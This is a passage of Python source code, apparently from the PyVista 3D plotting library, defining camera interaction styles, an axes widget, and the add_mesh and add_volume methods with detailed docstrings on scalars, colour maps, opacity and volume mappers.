def enable_joystick_style(self):
"""Set the interactive style to joystick.
It allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse if not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
"""Set the interactive style to rubber band zoom.
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
"""Set the interactive style to terrain.
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
"""Set the interactive style to rubber band picking.
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def set_focus(self, point):
"""Set focus to a point."""
self.renderer.set_focus(point)
self._render()
def set_position(self, point, reset=False):
"""Set camera position to a point."""
self.renderer.set_position(point, reset=reset)
self._render()
def set_viewup(self, vector):
"""Set camera viewup vector."""
self.renderer.set_viewup(vector)
self._render()
def _render(self):
"""Redraw the render window if it exists."""
if hasattr(self, 'ren_win'):
if hasattr(self, 'render_trigger'):
self.render_trigger.emit()
elif not self._first_time:
self.render()
def add_axes(self, interactive=None, line_width=2,
color=None, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', labels_off=False,
box=None, box_args=None):
"""Add an interactive axes widget."""
if interactive is None:
interactive = rcParams['interactive']
if hasattr(self, 'axes_widget'):
self.axes_widget.SetInteractive(interactive)
update_axes_label_color(color)
return
if box is None:
box = rcParams['axes']['box']
if box:
if box_args is None:
box_args = {}
self.axes_actor = create_axes_orientation_box(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel,
labels_off=labels_off, **box_args)
else:
self.axes_actor = create_axes_marker(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel, labels_off=labels_off)
self.axes_widget = vtk.vtkOrientationMarkerWidget()
self.axes_widget.SetOrientationMarker(self.axes_actor)
if hasattr(self, 'iren'):
self.axes_widget.SetInteractor(self.iren)
self.axes_widget.SetEnabled(1)
self.axes_widget.SetInteractive(interactive)
return
def hide_axes(self):
"""Hide the axes orientation widget."""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOff()
def show_axes(self):
"""Show the axes orientation widget."""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOn()
else:
self.add_axes()
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call vtkRenderWindowInteractor.Render() immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self._render()
Plotter.last_update_time = curr_time
else:
if force_redraw:
self.iren.Render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
loc=None, culling=None, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a siblge float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalars range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalars array from the mesh to
the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custum made transfer
function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result is showing colors that are not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot those
values as RGB(A) colors! ``rgba`` is also accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``below_label`` to
``'Below'``
above_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``above_label`` to
``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
the string annotations.
pickable : bool
Set whether this mesh is pickable
Return
------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(mesh)))
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, str(hex(id(mesh))))
if nan_color is None:
nan_color = rcParams['nan_color']
nan_color = list(parse_color(nan_color))
nan_color.append(nan_opacity)
if color is True:
color = rcParams['color']
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if has_matplotlib:
from itertools import cycle
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
mesh.compute_normals(cell_normals=False, inplace=True)
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=culling)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=culling,
pickable=pickable)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
if stitle is None:
stitle = original_scalar_name
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=preference, err=True)
opacity = normalize(opacity)
_custom_opac = True
except:
# Or get opacity transfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise RuntimeError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
pass
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalars formatting ==================================================
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: If str array, digitive and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = '{}-digitized'.format(title)
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool:
scalars = scalars.astype(np.float)
def prepare_mapper(scalars):
# Scalars interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
else:
self.mapper.SetColorModeToMapScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if log_scale:
table.SetScaleToLog10()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
if not has_matplotlib:
cmap = None
logging.warning('Please install matplotlib for color maps.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opactities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = cmap(hue)[:, :3]
# combine colors and alpha into a Nx4 matrix
scalars = np.concatenate((scalars, opacity[:, None]), axis=1)
scalars = (scalars * 255).astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
loc=None, culling=False, multi_colors=False,
blending='composite', mapper=None,
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UnformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custum made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
flip_scalars : bool, optional
Flip direction of cmap.
n_colors : int, optional
Number of colors to use when displaying scalars. Default
256.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'additive'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
If ``None`` the ``"volume_mapper"`` in the ``rcParams`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
the string annotations.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity transfer
function is defined. Meaning that over that distance, a given
opacity (from the transfer function) is accumulated. This is
adjusted for the actual sampling distance during rendering. By
default, this is the length of the diagonal of the bounding box of
the volume divided by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may perform
shading calculations - in some cases shading does not apply
(for example, in a maximum intensity projection) and therefore
shading will not be performed even if this flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
Return
------
actor: vtk.vtkVolume
VTK volume of the input data.
"""
# Handle default arguments
if name is None:
name = '{}({})'.format(type(volume).__name__, str(hex(id(volume))))
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if culling is True:
culling = 'backface'
if mapper is None:
mapper = rcParams["volume_mapper"]
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(volume)))
else:
# HACK: Make a copy so the original object is not altered
volume = volume.copy()
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories, loc=loc,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError('Type ({}) not supported for volume rendering at this time. Use `pyvista.UniformGrid`.')
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalars_info[1]
else:
raise RuntimeError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
if stitle is None:
stitle = title
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': vtk.vtkGPUVolumeRayCastMapper,
'open_gl': vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise RuntimeError('Mapper ({}) unknown. Available volume mappers include: {}'.format(mapper, ', '.join(mappers.keys())))
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float)
